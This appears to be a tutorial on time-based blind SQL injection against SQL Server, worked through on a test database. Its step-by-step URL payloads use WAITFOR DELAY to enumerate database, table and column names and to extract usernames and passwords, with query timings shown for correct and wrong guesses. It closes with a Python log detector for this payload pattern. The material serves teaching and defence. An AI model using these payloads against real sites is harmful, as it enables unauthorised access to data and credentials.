0x01 Preface
Time-based injection against SQL Server is rather awkward: the delay code must be placed at the very end of the SQL statement.
This means the injection point must be able to close off the existing query and use -- to comment out the remaining, now useless, code.
If there is no way to guarantee that waitfor delay '0:0:5' ends up at the end of the SQL, this method cannot be used.
0x02 Test data
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# Test table data: users
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 Guessing the database name
Note: changing db_name() to db_name(1) shows a different database name.
For example:
db_name() gives the currently connected database
db_name(1) gives database 1
db_name(2) gives database 2
Web request: http://www.test.com/sql.php?id=1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a
Database statement: select * from article WHERE id='1' IF(db_name() like '%test%') waitfor delay '0:0:5' -- a';
# Retrieving the name of the currently connected database
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.064 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.04 sec)
0x04 Guessing table names
Note:
The table_name inside OVER(Order by table_name) must be a column that exists in the information_schema.tables table.
To query a different database, do this:
For example:
table_catalog=db_name() (queries the current database)
table_catalog='name of the database to query'
To query different tables, do this:
For example:
change to row_number=1
change to row_number=2
Web request: http://www.test.com/sql.php?id=1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a
Database statement: select * from article WHERE id='1' IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like '%article%') waitfor delay '0:0:5' -- a';
# Retrieving table 1 of the current database
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               table_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                       table_name
                   FROM
                       information_schema.tables
                   WHERE
                       table_catalog = db_name()
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%article%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.03 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               table_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                       table_name
                   FROM
                       information_schema.tables
                   WHERE
                       table_catalog = db_name()
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%bbbb%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.05 sec)
# Retrieving table 2 of the current database
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               table_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                       table_name
                   FROM
                       information_schema.tables
                   WHERE
                       table_catalog = db_name()
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%users%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.05 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               table_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
                       table_name
                   FROM
                       information_schema.tables
                   WHERE
                       table_catalog = db_name()
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%aaaaaaa%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.03 sec)
0x05 Guessing column names
Note:
The column_name inside OVER(Order by column_name) must be a column that exists in the information_schema.columns table.
To query a different table, do this:
For example:
table_name='name of the table to query'
To query different columns, do this:
For example:
change to row_number=1
change to row_number=2
Web request: http://www.test.com/sql.php?id=1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a
Database statement: select * from article WHERE id='1' IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1) like '%id%') waitfor delay '0:0:5' -- a';
# Column list of the users table in the current database
1> SELECT
       *
   FROM
       (
           SELECT
               ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
               column_name
           FROM
               information_schema.columns
           WHERE
               table_catalog = db_name()
               AND table_name = 'users'
       ) AS a;
2> go
+-------------+-------------+
| row_number | column_name |
+-------------+-------------+
| 1 | id |
| 2 | password |
| 3 | username |
+-------------+-------------+
(3 rows affected)
# Retrieving the first column of the users table in the current database
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               column_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                       column_name
                   FROM
                       information_schema.columns
                   WHERE
                       table_catalog = db_name()
                       AND table_name = 'users'
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%id%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.077 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               column_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                       column_name
                   FROM
                       information_schema.columns
                   WHERE
                       table_catalog = db_name()
                       AND table_name = 'users'
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%aaaaaaaaa%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.003 sec)
# Retrieving the second column of the users table in the current database
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               column_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                       column_name
                   FROM
                       information_schema.columns
                   WHERE
                       table_catalog = db_name()
                       AND table_name = 'users'
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%password%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.05 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               column_name
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
                       column_name
                   FROM
                       information_schema.columns
                   WHERE
                       table_catalog = db_name()
                       AND table_name = 'users'
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%savasv%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.03 sec)
0x06 Guessing contents
Note:
The username inside OVER(Order by username) must be a column that exists in the users table.
To retrieve data from other columns, change a.username in the web request.
For example:
The columns of the users table are: id, username, password
Because I used an alias, to retrieve the other columns change it to
a.id, a.username, a.password
To query different rows, do this:
For example:
change to row_number=1
change to row_number=2
Web request: http://www.test.com/sql.php?id=1' IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a
Database statement: select * from article WHERE id='1' IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like '%test-user-01%') waitfor delay '0:0:5' -- a';
# Querying the username column of the first row in the users table
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               a.username
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY username) AS row_number, *
                   FROM
                       users
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%test-user-01%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.07 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               a.username
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY username) AS row_number, *
                   FROM
                       users
               ) AS a
           WHERE
               row_number = 1
       ) LIKE '%aaaaaa%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.07 sec)
# Querying the password column of the second row in the users table
# Correct guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               a.password
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY username) AS row_number, *
                   FROM
                       users
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%234567%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (5.06 sec)
# Wrong guess
1> SELECT
       *
   FROM
       article
   WHERE
       id = '1'
   IF (
       (
           SELECT
               a.password
           FROM
               (
                   SELECT
                       ROW_NUMBER () OVER (ORDER BY username) AS row_number, *
                   FROM
                       users
               ) AS a
           WHERE
               row_number = 2
       ) LIKE '%aascacascsac%'
   ) WAITFOR delay '0:0:5' -- a';
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected) (0.06 sec)
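From the defender's side, the structural constraint described in 0x01 (closing quote, IF(...) condition, WAITFOR DELAY at the tail, -- comment) and the enumeration requests in 0x03 to 0x06 give a recognisable request shape, and a correct guess also stalls the response by the full delay while a wrong guess returns quickly. The following Python is an added example, not part of the original post; it runs that detection over constructed access-log lines (path plus response time in seconds, an assumed log format) and flags both the signature and the observed delay.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (assumed format: "<request path> <response seconds>").
SAMPLE_LOG = """\
/sql.php?id=1 0.04
/sql.php?id=1'+IF(db_name()+like+'%25test%25')+waitfor+delay+'0:0:5'+--+a 5.06
/sql.php?id=1'+IF((select+table_name+from+(select+ROW_NUMBER()+OVER(Order+by+table_name)+AS+row_number,table_name+FROM+information_schema.tables+where+table_catalog=db_name())+as+a+where+row_number=1)+like+'%25bbbb%25')+waitfor+delay+'0:0:5'+--+a 0.05
/sql.php?id=2 0.03
"""

# Signatures for the payload shape the post relies on.
WAITFOR = re.compile(r"waitfor\s+delay\s+'[\d:]+'", re.I)          # delay primitive at the tail
IF_COND = re.compile(r"'\s*if\s*\(", re.I)                           # closing quote followed by IF(
COMMENT_TAIL = re.compile(r"--\s*\w*\s*$")                           # trailing comment that discards the rest
ENUM = re.compile(r"row_number\s*\(\s*\)\s*over|information_schema\.(tables|columns)|db_name\s*\(", re.I)

def classify(path, seconds, delay_threshold=4.5):
    """Return the reasons a request looks like time-based blind SQL injection ([] if clean)."""
    q = unquote_plus(path)  # decode %xx and '+' so the regexes see the SQL as the server did
    reasons = []
    if WAITFOR.search(q):
        reasons.append("waitfor-delay")
    if IF_COND.search(q) and COMMENT_TAIL.search(q):
        reasons.append("quote-if-comment-shape")
    if ENUM.search(q):
        reasons.append("schema-enumeration")
    # Only a correct guess stalls the response by the full delay, so the wrong guesses
    # (fast responses) are caught by the signature checks above, not by timing.
    if reasons and seconds >= delay_threshold:
        reasons.append("delay-observed")
    return reasons

def scan(log_text):
    """Return (path, reasons) for every suspicious line in the log text."""
    hits = []
    for line in log_text.splitlines():
        path, secs = line.rsplit(" ", 1)
        reasons = classify(path, float(secs))
        if reasons:
            hits.append((path, reasons))
    return hits

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_LOG):
        print(", ".join(reasons), "<-", unquote_plus(path))
```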